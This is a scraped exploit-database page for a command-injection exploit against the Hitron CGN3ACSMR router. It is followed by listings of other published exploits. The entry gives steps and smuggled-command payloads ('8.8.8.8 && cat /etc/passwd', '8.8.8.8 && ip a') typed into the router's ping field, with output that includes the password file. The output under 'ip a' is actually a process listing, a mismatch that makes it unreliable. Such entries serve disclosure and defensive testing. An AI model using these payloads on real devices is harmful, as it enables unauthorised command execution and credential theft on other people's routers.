Menu

Search for hundreds of thousands of exploits

"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution"

Author

Exploit author

"Dolev Farhi"

Platform

Exploit platform

hardware

Release date

Exploit published date

2015-10-30

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# Exploit title: Hitron Router (CGN3ACSMR) - Remote Code Execution 
# Author: Dolev Farhi (dolevf at protonmail.ch)
# Date: 29-10-2015
# Vendor homepage: http://www.hitrontech.com/en/index.php
# Software version: 4.5.8.16
# Hardware version: 1A

# Details:
Hitron routers provide an interface to test connectivity (ping, tracert) via the graphical user interface of the router (Management UI).
This interface is vulnerable to code injection using the && argument after the IP address.

# Steps to reproduce:
1. Navigate to the dashboard
2. Navigate to the admin tab
3. Type an ip address in the Destination form
4. append any code you want after the ip.

Example one: 
8.8.8.8 && cat /etc/passwd

Result

root:$1$27272727:0:0::/:/bin/false
nobody:$1$27272727:65535:65535::/:/bin/false
rogcesadmin:filtered/:100:100::/:/usr/sbin/cli
=============Complete==============



Example two:
8.8.8.8 && ip a 
PID USER VSZ STAT COMMAND
1 root 1268 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
5 root 0 SW [kworker/u:0]
6 root 0 SW< [khelper]
7 root 0 SW [irq/74-hw_mutex]
8 root 0 SW [sync_supers]
9 root 0 SW [bdi-default]
10 root 0 SW< [kblockd]
11 root 0 SW< [gPunitWorkqueue]
12 root 0 SW [irq/79-punit_in]
13 root 0 SW [kswapd0]
14 root 0 SW< [crypto]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-30 "Intelbras Router RF 301K 1.1.2 - Authentication Bypass" webapps hardware "Kaio Amaral"
2020-11-30 "ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure" webapps hardware "Zagros Bingol"
2020-11-27 "Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution" webapps hardware "Emre SUREN"
2020-11-24 "Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)" webapps hardware maj0rmil4d
2020-11-23 "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass" webapps hardware malwrforensics
2020-11-19 "Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification" webapps hardware "Ricardo Longatto"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-16 "Cisco 7937G - DoS/Privilege Escalation" remote hardware "Cody Martin"
2020-11-13 "ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)" webapps hardware b1ack0wl
2020-11-13 "Citrix ADC NetScaler - Local File Inclusion (Metasploit)" webapps hardware "RAMELLA Sebastien"
Release Date Title Type Platform Author
2020-11-19 "M/Monit 3.7.4 - Password Disclosure" webapps multiple "Dolev Farhi"
2020-11-19 "M/Monit 3.7.4 - Privilege Escalation" webapps multiple "Dolev Farhi"
2020-05-01 "VirtualTablet Server 3.0.2 - Denial of Service (PoC)" dos windows "Dolev Farhi"
2019-02-18 "M/Monit 3.7.2 - Privilege Escalation" webapps multiple "Dolev Farhi"
2018-06-18 "RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery (Add Admin)" webapps linux "Dolev Farhi"
2018-06-11 "userSpice 4.3.24 - Username Enumeration" webapps php "Dolev Farhi"
2018-06-11 "userSpice 4.3.24 - 'X-Forwarded-For' Cross-Site Scripting" webapps php "Dolev Farhi"
2018-02-16 "UserSpice 4.3 - Blind SQL Injection" webapps php "Dolev Farhi"
2018-02-14 "userSpice 4.3 - Cross-Site Scripting" webapps php "Dolev Farhi"
2017-03-16 "Cobbler 2.8.0 - (Authenticated) Remote Code Execution" webapps linux "Dolev Farhi"
2016-08-04 "ntop-ng 2.5.160805 - Username Enumeration" webapps multiple "Dolev Farhi"
2016-04-29 "Observium 0.16.7533 - Cross-Site Request Forgery" webapps php "Dolev Farhi"
2016-04-29 "Observium 0.16.7533 - (Authenticated) Arbitrary Command Execution" webapps php "Dolev Farhi"
2015-12-01 "ntop-ng 2.0.151021 - Privilege Escalation" webapps multiple "Dolev Farhi"
2015-10-30 "Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution" webapps hardware "Dolev Farhi"
2015-06-12 "Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities" webapps multiple "Dolev Farhi"
2015-05-20 "ZOC SSH Client - Buffer Overflow (SEH) (PoC)" dos windows "Dolev Farhi"
2014-09-29 "OpenFiler 2.99.1 - Cross-Site Request Forgery" webapps php "Dolev Farhi"
2014-09-20 "M/Monit 3.3.2 - Cross-Site Request Forgery" webapps php "Dolev Farhi"
2014-09-02 "Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)" webapps multiple "Dolev Farhi"
2014-07-25 "Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting" webapps multiple "Dolev Farhi"
2014-07-23 "NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure" webapps hardware "Dolev Farhi"
2014-05-25 "User Cake - Cross-Site Request Forgery" webapps php "Dolev Farhi"
2014-05-24 "Mayan-EDms Web-Based Document Management OS System - Multiple Persistent Cross-Site Scripting Vulnerabilities" webapps multiple "Dolev Farhi"
2014-05-12 "SpiceWorks 7.2.00174 - Persistent Cross-Site Scripting" webapps windows "Dolev Farhi"
2014-05-08 "OpenFiler 2.99.1 - Arbitrary Code Execution" webapps hardware "Dolev Farhi"
2014-05-08 "Cobbler 2.4.x < 2.6.x - Local File Inclusion" webapps php "Dolev Farhi"
2014-05-08 "OpenFiler 2.99.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities" webapps hardware "Dolev Farhi"
2014-05-01 "NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting" webapps hardware "Dolev Farhi"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.